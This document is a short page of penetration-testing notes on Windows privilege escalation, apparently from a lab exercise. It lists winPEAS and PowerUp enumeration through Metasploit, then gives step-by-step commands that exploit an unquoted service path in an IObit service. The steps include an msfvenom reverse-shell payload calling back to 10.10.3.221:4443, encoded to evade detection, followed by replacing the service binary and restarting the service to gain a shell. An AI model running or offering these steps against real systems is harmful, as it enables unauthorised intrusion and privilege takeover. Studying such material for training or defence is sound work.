Windows Priv esc

Living of the land GTFO Bins for Windows

Enumeration with Winpeas

wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe

Enumeration with powerup.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

upload the script with metasploit

upload /root/PowerSploit/Privesc/PowerUp.ps1

Now run the script with Powershell

load Powershell
powershell_shell
.\PowerUp.ps1
Invoke-Allchecks

The Iobit AdvancedSystemCareService9 service is vulnerable to path hijack. No quotes are being used to enclose the path.

unquoted service path vulnerability

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Now create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -

using reverse meterpreter payload dies if used and we have to chain it with post/windows/manage/migrate

Now upload the malicious file and changer meterpreter to shell, stop the service and then copy the file the same location, start listener at port 4443 and start the service again.

upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and we got the reverse shell

Windows compiled exploits

PreviousPrivilege EscalationNextLinux Priv esc

Last updated